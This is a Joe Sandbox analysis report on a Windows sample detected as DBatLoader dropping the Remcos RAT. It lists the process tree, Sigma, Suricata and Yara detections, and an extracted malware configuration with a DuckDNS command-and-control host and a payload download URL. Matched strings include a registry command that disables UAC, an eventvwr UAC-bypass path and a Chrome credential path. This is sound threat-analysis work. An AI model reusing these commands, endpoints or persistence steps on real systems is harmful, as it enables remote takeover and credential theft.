Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MeP66xi1AM.exe

Overview

General Information

Sample name:MeP66xi1AM.exe
renamed because original name is a hash value
Original sample name:b9803b83ed42e8f63e73719cfffeff30ecfabeca676a3a04a087754e2608a1c5.exe
Analysis ID:1576964
MD5:f8cdbdf8318c11c2e3e286195f067042
SHA1:af9c826e25d7d9242c5957cf753af46dcb45fd33
SHA256:b9803b83ed42e8f63e73719cfffeff30ecfabeca676a3a04a087754e2608a1c5
Tags:exeuser-JAMESWT_MHT
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample is not signed and drops a device driver
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Uses dynamic DNS services
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • MeP66xi1AM.exe (PID: 768 cmdline: "C:\Users\user\Desktop\MeP66xi1AM.exe" MD5: F8CDBDF8318C11C2E3E286195F067042)
    • cmd.exe (PID: 3652 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 828 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Wnbcdrjt.PIF (PID: 4876 cmdline: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" MD5: F8CDBDF8318C11C2E3E286195F067042)
    • cmd.exe (PID: 3152 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 1540 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326"]}

Threatname: Remcos

{"Host:Port:Password": ["hafiznor3374.duckdns.org:4610:1", "127.0.0.1:4610:1"], "Assigned name": "FM NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-L3FHGJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
MeP66xi1AM.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\Public\Libraries\Wnbcdrjt.PIFJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2176891397.000000007EBA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x691e0:$a1: Remcos restarted by watchdog!
          • 0x69738:$a3: %02i:%02i:%02i:%03i
          • 0x69abd:$a4: * Remcos v
          00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x6320c:$str_b2: Executing file:
          • 0x64328:$str_b3: GetDirectListeningPort
          • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x63e30:$str_b7: \update.vbs
          • 0x63234:$str_b9: Downloaded file:
          • 0x63220:$str_b10: Downloading file:
          • 0x632c4:$str_b12: Failed to upload file:
          • 0x642f0:$str_b13: StartForward
          • 0x64310:$str_b14: StopForward
          • 0x63dd8:$str_b15: fso.DeleteFile "
          • 0x63d6c:$str_b16: On Error Resume Next
          • 0x63e08:$str_b17: fso.DeleteFolder "
          • 0x632b4:$str_b18: Uploaded file:
          • 0x63274:$str_b19: Unable to delete:
          • 0x63da0:$str_b20: while fso.FileExists("
          • 0x63749:$str_c0: [Firefox StoredLogins not found]
          00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
          • 0x63100:$s1: \Classes\mscfile\shell\open\command
          • 0x63160:$s1: \Classes\mscfile\shell\open\command
          • 0x63148:$s2: eventvwr.exe
          Click to see the 11 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.colorcpl.exe.4a80000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            5.2.colorcpl.exe.4a80000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x679e0:$a1: Remcos restarted by watchdog!
            • 0x67f38:$a3: %02i:%02i:%02i:%03i
            • 0x682bd:$a4: * Remcos v
            5.2.colorcpl.exe.4a80000.0.unpackREMCOS_RAT_variantsunknownunknown
            • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
            • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x61a0c:$str_b2: Executing file:
            • 0x62b28:$str_b3: GetDirectListeningPort
            • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x62630:$str_b7: \update.vbs
            • 0x61a34:$str_b9: Downloaded file:
            • 0x61a20:$str_b10: Downloading file:
            • 0x61ac4:$str_b12: Failed to upload file:
            • 0x62af0:$str_b13: StartForward
            • 0x62b10:$str_b14: StopForward
            • 0x625d8:$str_b15: fso.DeleteFile "
            • 0x6256c:$str_b16: On Error Resume Next
            • 0x62608:$str_b17: fso.DeleteFolder "
            • 0x61ab4:$str_b18: Uploaded file:
            • 0x61a74:$str_b19: Unable to delete:
            • 0x625a0:$str_b20: while fso.FileExists("
            • 0x61f49:$str_c0: [Firefox StoredLogins not found]
            5.2.colorcpl.exe.4a80000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
            • 0x61900:$s1: \Classes\mscfile\shell\open\command
            • 0x61960:$s1: \Classes\mscfile\shell\open\command
            • 0x61948:$s2: eventvwr.exe
            5.2.colorcpl.exe.68d0000.2.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 21 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
              Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\MeP66xi1AM.exe, ProcessId: 768, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
              Sigma detected: Execution from Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , CommandLine: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Wnbcdrjt.PIF, NewProcessName: C:\Users\Public\Libraries\Wnbcdrjt.PIF, OriginalFileName: C:\Users\Public\Libraries\Wnbcdrjt.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , ProcessId: 4876, ProcessName: Wnbcdrjt.PIF
              Sigma detected: Files With System Process Name In Unsuspected Locations
              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\MeP66xi1AM.exe, ProcessId: 768, TargetFilename: C:\Windows \SysWOW64\svchost.exe
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wnbcdrjt.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\MeP66xi1AM.exe, ProcessId: 768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wnbcdrjt
              Sigma detected: Parent in Public Folder Suspicious Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , ParentImage: C:\Users\Public\Libraries\Wnbcdrjt.PIF, ParentProcessId: 4876, ParentProcessName: Wnbcdrjt.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 3152, ProcessName: cmd.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wnbcdrjt.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\MeP66xi1AM.exe, ProcessId: 768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wnbcdrjt
              Sigma detected: Execution of Suspicious File Type Extension
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , CommandLine: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Wnbcdrjt.PIF, NewProcessName: C:\Users\Public\Libraries\Wnbcdrjt.PIF, OriginalFileName: C:\Users\Public\Libraries\Wnbcdrjt.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , ProcessId: 4876, ProcessName: Wnbcdrjt.PIF

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: 82 BA 33 88 9E ED 44 FA DE 11 38 01 B1 96 95 25 26 82 03 28 1F F7 9D 3E 09 99 6B 82 EE 45 B6 60 96 E8 CD B9 FB E7 62 EF E6 FA F1 BB 2B D3 80 19 B3 91 3A 2E B3 FC 49 A6 10 EE 5A BB 10 19 F3 77 D0 84 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-L3FHGJ\exepath

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T19:47:03.077202+010020283713Unknown Traffic192.168.2.64970823.237.50.106443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T19:47:18.570061+010020365941Malware Command and Control Activity Detected192.168.2.649710192.169.69.264610TCP
              2024-12-17T19:47:32.137548+010020365941Malware Command and Control Activity Detected192.168.2.649742192.169.69.264610TCP
              2024-12-17T19:47:45.660104+010020365941Malware Command and Control Activity Detected192.168.2.649776192.169.69.264610TCP
              2024-12-17T19:47:59.101670+010020365941Malware Command and Control Activity Detected192.168.2.649808192.169.69.264610TCP
              2024-12-17T19:48:12.620564+010020365941Malware Command and Control Activity Detected192.168.2.649841192.169.69.264610TCP
              2024-12-17T19:48:26.454189+010020365941Malware Command and Control Activity Detected192.168.2.649874192.169.69.264610TCP
              2024-12-17T19:48:40.016570+010020365941Malware Command and Control Activity Detected192.168.2.649907192.169.69.264610TCP
              2024-12-17T19:48:53.595546+010020365941Malware Command and Control Activity Detected192.168.2.649939192.169.69.264610TCP
              2024-12-17T19:49:07.185091+010020365941Malware Command and Control Activity Detected192.168.2.649972192.169.69.264610TCP
              2024-12-17T19:49:20.695746+010020365941Malware Command and Control Activity Detected192.168.2.650004192.169.69.264610TCP
              2024-12-17T19:49:34.539024+010020365941Malware Command and Control Activity Detected192.168.2.650007192.169.69.264610TCP
              2024-12-17T19:49:48.249996+010020365941Malware Command and Control Activity Detected192.168.2.650009192.169.69.264610TCP
              2024-12-17T19:50:01.813406+010020365941Malware Command and Control Activity Detected192.168.2.650011192.169.69.264610TCP
              2024-12-17T19:50:15.367649+010020365941Malware Command and Control Activity Detected192.168.2.650013192.169.69.264610TCP
              2024-12-17T19:50:28.914990+010020365941Malware Command and Control Activity Detected192.168.2.650015192.169.69.264610TCP
              2024-12-17T19:50:42.759117+010020365941Malware Command and Control Activity Detected192.168.2.650017192.169.69.264610TCP
              2024-12-17T19:50:56.293614+010020365941Malware Command and Control Activity Detected192.168.2.650019192.169.69.264610TCP
              2024-12-17T19:51:09.722195+010020365941Malware Command and Control Activity Detected192.168.2.650022192.169.69.264610TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: hafiznor3374.duckdns.orgAvira URL Cloud: Label: malware
              Found malware configuration
              Source: MeP66xi1AM.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326"]}
              Source: 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["hafiznor3374.duckdns.org:4610:1", "127.0.0.1:4610:1"], "Assigned name": "FM NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-L3FHGJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFReversingLabs: Detection: 52%
              Multi AV Scanner detection for submitted file
              Source: MeP66xi1AM.exeReversingLabs: Detection: 52%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 828, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: MeP66xi1AM.exeJoe Sandbox ML: detected
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB15EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_04AB15EC
              Source: colorcpl.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
              Source: MeP66xi1AM.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 23.237.50.106:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbGCTL source: MeP66xi1AM.exe, 00000000.00000003.2172985786.0000000021AB1000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172985786.0000000021A82000.00000004.00000020.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2310644496.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2310644496.0000000000798000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B358B4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A887A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04A887A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A9A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_04A9A01B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_04A8B28E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04A8838E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_04A8AC78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A868CD FindFirstFileW,FindNextFileW,5_2_04A868CD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A87848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_04A87848
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A97AAB FindFirstFileW,FindNextFileW,FindNextFileW,5_2_04A97AAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_04A8AA71
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04ACBA59 FindFirstFileExA,5_2_04ACBA59
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A86D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_04A86D28

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49710 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49742 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49776 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49808 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49841 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49907 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49874 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49939 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49972 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50007 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50004 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50013 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50009 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50019 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50011 -> 192.169.69.26:4610
